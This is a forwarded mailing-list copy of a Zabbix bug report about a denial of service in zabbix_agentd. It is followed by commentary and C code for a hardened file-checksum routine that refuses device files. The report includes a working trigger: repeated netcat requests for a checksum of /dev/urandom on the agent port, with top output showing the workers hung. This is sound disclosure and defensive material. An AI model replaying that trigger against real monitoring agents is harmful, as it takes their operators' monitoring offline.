hi,

see upstream's response.

----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]> -----

From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: [EMAIL PROTECTED]
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd


     [ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Alexei Vladishev closed ZBX-328.
--------------------------------

    Resolution: Fixed

The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be 
released this week.

Alexei

> Possible DoS against zabbix-agentd
> ----------------------------------
>
>                 Key: ZBX-328
>                 URL: https://support.zabbix.com/browse/ZBX-328
>             Project: ZABBIX
>          Issue Type: Bug
>          Components: Agent (Unix)
>         Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 2.80GHz
>            Reporter: Milen Rangelov
>            Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU 
> resources.
> This can be triggered by sending the agent a file checksum request 
> (vfs.file.cksum[file]) with the file argument being some "special" device file 
> like /dev/zero or /dev/urandom (the latter raises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then 
> the zabbix_agentd service will not be able to serve any requests until it's 
> restarted.
> Here's an example session:
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total,   5 running, 178 sleeping,   0 stopped,   0 zombie 
> Cpu(s):  2.0%us, 97.0%sy,  1.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
> <snip>
>     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 24381 zabbix    30   5  5056 1032  768 R   65  0.1   4:16.01 zabbix_agentd
> 24382 zabbix    30   5  5068 1044  776 R   50  0.1   4:12.18 zabbix_agentd
> 24380 zabbix    30   5  5068 1044  776 R   50  0.1   4:01.24 zabbix_agentd
> 24379 zabbix    30   5  5056 1036  772 R   31  0.1   4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so 
> hard to spoof it if he's on the same Ethernet segment as the host running the 
> zabbix_agent.

-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: 
https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira


----- End forwarded message -----
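The report above boils down to one missing check: the agent's checksum item opened whatever path it was handed and read until EOF, and a character device like /dev/urandom has no EOF, so each request pinned one worker forever. The example below is added here for illustration and is not Zabbix's code or the 1.4.5 fix (which the forwarded mail does not show); it demonstrates the two guards a practitioner would want in such an item: fstat plus S_ISREG to refuse devices, FIFOs, directories and sockets before any read, and a byte cap so even a regular file cannot tie up a worker indefinitely. The function names (cksum_file, write_temp), the status codes and the 64 MB cap in main are assumptions. The CRC is the POSIX cksum(1) algorithm, so results for regular files match the shell tool.

```c
#define _POSIX_C_SOURCE 200809L  /* mkstemp, fstat, O_NONBLOCK */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical status codes for the hardened checksum item. */
enum cksum_status {
    CKSUM_OK = 0,
    CKSUM_ERR_OPEN,         /* open(2) failed */
    CKSUM_ERR_NOT_REGULAR,  /* device, FIFO, directory, socket: refused unread */
    CKSUM_ERR_TOO_LARGE,    /* regular file above the caller's byte cap */
    CKSUM_ERR_READ          /* read(2) failed part way through */
};

/* POSIX cksum(1) CRC table: polynomial 0x04C11DB7, MSB first, no reflection. */
static uint32_t crc_table[256];
static int crc_table_ready = 0;

static void init_crc_table(void)
{
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i << 24;
        for (int k = 0; k < 8; k++)
            c = (c & 0x80000000u) ? (c << 1) ^ 0x04C11DB7u : (c << 1);
        crc_table[i] = c;
    }
    crc_table_ready = 1;
}

/* Hardened "checksum this path": refuse anything that is not a regular file,
   refuse regular files larger than max_bytes, and never read past max_bytes
   even if the file grows while it is being read. */
enum cksum_status cksum_file(const char *path, off_t max_bytes, uint32_t *out)
{
    if (!crc_table_ready)
        init_crc_table();

    /* O_NONBLOCK: opening a FIFO with no writer would otherwise block here,
       which is a second way to park a worker. For regular files it is a no-op. */
    int fd = open(path, O_RDONLY | O_NONBLOCK);
    if (fd < 0)
        return CKSUM_ERR_OPEN;

    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);                       /* /dev/zero, /dev/urandom land here */
        return CKSUM_ERR_NOT_REGULAR;
    }
    if (st.st_size > max_bytes) {
        close(fd);
        return CKSUM_ERR_TOO_LARGE;
    }

    uint32_t crc = 0;
    off_t total = 0;
    unsigned char buf[4096];
    for (;;) {
        ssize_t n = read(fd, buf, sizeof buf);
        if (n < 0) { close(fd); return CKSUM_ERR_READ; }
        if (n == 0) break;
        if (total + n > max_bytes) { close(fd); return CKSUM_ERR_TOO_LARGE; }
        total += n;
        for (ssize_t i = 0; i < n; i++)
            crc = (crc << 8) ^ crc_table[(crc >> 24) ^ buf[i]];
    }
    close(fd);

    /* cksum(1) folds the byte count into the CRC, least significant byte first,
       then complements. An empty file therefore yields 0xFFFFFFFF. */
    for (off_t len = total; len != 0; len >>= 8)
        crc = (crc << 8) ^ crc_table[(crc >> 24) ^ (unsigned char)(len & 0xff)];
    *out = ~crc;
    return CKSUM_OK;
}

/* Test helper (not part of the item): write constructed bytes to a temp file.
   path must have room for at least 17 bytes. Returns 0 on success. */
int write_temp(const char *data, size_t len, char *path)
{
    strcpy(path, "/tmp/cksumXXXXXX");
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t off = 0;
    while (off < len) {
        ssize_t n = write(fd, data + off, len - off);
        if (n < 0) { close(fd); return -1; }
        off += (size_t)n;
    }
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    /* Default to the reporter's trigger path; with the guard it returns at once. */
    const char *path = argc > 1 ? argv[1] : "/dev/urandom";
    uint32_t sum = 0;
    enum cksum_status rc = cksum_file(path, 64L * 1024 * 1024, &sum);  /* assumed cap */
    if (rc == CKSUM_OK)
        printf("%u\n", sum);
    else
        printf("%s: refused (status %d)\n", path, (int)rc);
    return rc == CKSUM_OK ? 0 : 1;
}
```

The order matters: the fstat check runs before the first read, so a device file costs one open and one close rather than a worker. The byte cap is a defence in depth for regular files (for example a sparse multi-gigabyte log) that would otherwise keep a worker busy for a long, if finite, time; pick the cap to match the largest file you actually intend to checksum.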


